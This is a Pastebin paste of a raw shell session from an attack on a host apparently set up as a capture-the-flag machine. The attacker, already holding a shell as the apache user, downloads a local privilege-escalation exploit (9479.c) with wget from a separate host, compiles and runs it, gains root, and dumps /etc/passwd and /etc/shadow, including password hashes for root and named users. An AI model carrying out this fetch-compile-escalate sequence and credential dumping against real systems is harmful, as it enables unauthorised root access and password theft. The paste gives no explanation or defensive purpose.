Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- sh: no job control in this shell
- sh-3.1$ id
- uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t
- sh-3.1$ uname -a
- Linux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
- sh-3.1$ cd /tmp/
- sh-3.1$ ls -la
- total 904
- drwxrwxrwt 15 root root 4096 Jan 11 10:07 .
- drwxr-xr-x 23 root root 4096 Jan 11 09:38 ..
- drwxrwxrwt 2 root root 4096 Jan 11 07:15 .ICE-unix
- -r--r--r-- 1 root root 11 Jan 11 07:07 .X0-lock
- drwxrwxrwt 2 root root 4096 Jan 11 07:07 .X11-unix
- drwxrwxrwt 2 root root 4096 Jan 11 07:06 .font-unix
- srw-rw-rw- 1 root root 0 Jan 11 07:07 .gdm_socket
- drwx------ 2 root root 4096 Mar 6 2009 .mozilla
- -rw-rw-rw- 1 mysql mysql 13 Jan 11 09:57 1.txt
- -rw-rw-rw- 1 mysql mysql 36 Jan 11 09:58 2.txt
- drwx------ 2 achen achen 4096 Mar 10 2009 gconfd-achen
- drwx------ 2 dstevens dstevens 4096 Mar 11 2009 gconfd-dstevens
- drwx------ 2 ghighland ghighland 4096 Mar 10 2009 gconfd-ghighland
- drwx------ 2 root root 4096 Mar 18 2009 gconfd-root
- drwx------ 3 sorzek sorzek 4096 Jan 11 07:15 gconfd-sorzek
- drwx------ 2 sorzek sorzek 4096 Jan 11 07:15 keyring-FiP3XI
- srwxrwxr-x 1 achen achen 0 Mar 10 2009 mapping-achen
- srwxrwxr-x 1 dstevens dstevens 0 Mar 11 2009 mapping-dstevens
- srwxrwxr-x 1 ghighland ghighland 0 Mar 10 2009 mapping-ghighland
- srwxr-xr-x 1 root root 0 Mar 18 2009 mapping-root
- srwxrwxr-x 1 sorzek sorzek 0 Jan 11 07:15 mapping-sorzek
- drwx------ 2 sorzek sorzek 4096 Jan 11 07:16 orbit-sorzek
- -rwsr-xr-x 1 root root 720888 Jan 11 10:09 sh
- drwx------ 2 sorzek sorzek 4096 Jan 11 07:15 ssh-yXwuKb2964
- -rw-rw-rw- 1 mysql mysql 13 Jan 11 10:07 test1.txt
- -rw-rw-rw- 1 mysql mysql 36 Jan 11 10:07 test2.txt
- drwx------ 2 sorzek sorzek 4096 Jan 11 07:15 virtual-sorzek.7IeXOH
- -rw------- 1 sorzek sorzek 1062 Jan 11 08:15 xses-sorzek.HeSMY4
- sh-3.1$ wget http://192.168.221.130/exploit/9479.c
- --10:09:30-- http://192.168.221.130/exploit/9479.c
- => `9479.c'
- Connecting to 192.168.221.130:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 3,379 (3.3K) [text/x-csrc]
- 0K ... 100% 61.97 MB/s
- 10:09:30 (61.97 MB/s) - `9479.c' saved [3379/3379]
- sh-3.1$ gcc 9479.c -o root
- sh-3.1$ ./root
- sh: no job control in this shell
- sh-3.1# id
- uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_sys_script_t
- sh-3.1# cat /etc/passwd
- root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- news:x:9:13:news:/etc/news:
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- rpm:x:37:37::/var/lib/rpm:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- distcache:x:94:94:Distcache:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
- mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
- netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
- pcap:x:77:77::/var/arpwatch:/sbin/nologin
- avahi:x:70:70:Avahi daemon:/:/sbin/nologin
- named:x:25:25:Named:/var/named:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
- xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
- gdm:x:42:42::/var/gdm:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- dstevens:x:500:506:Don Stevens:/home/dstevens:/bin/bash
- achen:x:501:501:Andrew Chen:/home/achen:/bin/bash
- pmoore:x:502:502:Phillip Moore:/home/pmoore:/bin/bash
- jdurbin:x:503:503:James Durbin:/home/jdurbin:/bin/bash
- sorzek:x:504:504:Sally Orzek:/home/sorzek:/bin/bash
- ghighland:x:505:505:Greg Highland:/home/ghighland:/bin/bash
- ossec:x:506:508::/var/ossec:/sbin/nologin
- ossecm:x:507:508::/var/ossec:/sbin/nologin
- ossecr:x:508:508::/var/ossec:/sbin/nologin
- sh-3.1# cat /etc/issue
- Fedora Core release 5 (Bordeaux)
- Kernel \r on an \m
- sh-3.1# cat /etc/shadow
- root:$1$IW2CPQzs$ba/aJ9zePc/r9tF2R6KAJ0:15350:0:99999:7:::
- bin:*:14309:0:99999:7:::
- daemon:*:14309:0:99999:7:::
- adm:*:14309:0:99999:7:::
- lp:*:14309:0:99999:7:::
- sync:*:14309:0:99999:7:::
- shutdown:*:14309:0:99999:7:::
- halt:*:14309:0:99999:7:::
- mail:*:14309:0:99999:7:::
- news:*:14309:0:99999:7:::
- uucp:*:14309:0:99999:7:::
- operator:*:14309:0:99999:7:::
- games:*:14309:0:99999:7:::
- gopher:*:14309:0:99999:7:::
- ftp:*:14309:0:99999:7:::
- nobody:*:14309:0:99999:7:::
- dbus:!!:14309:0:99999:7:::
- rpm:!!:14309:0:99999:7:::
- apache:!!:14309:0:99999:7:::
- distcache:!!:14309:0:99999:7:::
- ntp:!!:14309:0:99999:7:::
- nscd:!!:14309:0:99999:7:::
- vcsa:!!:14309:0:99999:7:::
- webalizer:!!:14309:0:99999:7:::
- dovecot:!!:14309:0:99999:7:::
- mysql:!!:14309:0:99999:7:::
- netdump:!!:14309:0:99999:7:::
- pcap:!!:14309:0:99999:7:::
- avahi:!!:14309:0:99999:7:::
- named:!!:14309:0:99999:7:::
- mailnull:!!:14309:0:99999:7:::
- smmsp:!!:14309:0:99999:7:::
- haldaemon:!!:14309:0:99999:7:::
- rpc:!!:14309:0:99999:7:::
- xfs:!!:14309:0:99999:7:::
- gdm:!!:14309:0:99999:7:::
- rpcuser:!!:14309:0:99999:7:::
- nfsnobody:!!:14309:0:99999:7:::
- sshd:!!:14309:0:99999:7:::
- dstevens:$1$fU8HOHqa$N542xtl0ft8NmsYkv5NFo/:14309:0:99999:7:::
- achen:$1$kxyn25Oz$w.MMADGQYIq4F52hi9DUQ.:14309:0:99999:7:::
- pmoore:$1$p0RXlomV$m03UsjoTZ08qG8gbWHgST0:14309:0:99999:7:::
- jdurbin:$1$CYmEyuc.$FXAeZHkhywwENbqE8h0O.0:14309:0:99999:7:::
- sorzek:$1$cWeWNRdU$VTtlKsoRBmhMghnkSwqCQ.:14312:0:99999:7:::
- ghighland:$1$ooKvtZEY$N2RpSaIylgFlHnBkbwUGz0:14309:0:99999:7:::
- ossec:!!:14312:0:99999:7:::
- ossecm:!!:14312:0:99999:7:::
- ossecr:!!:14312:0:99999:7:::
- sh-3.1# exit
- exit
- sh-3.1$ exit
- exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement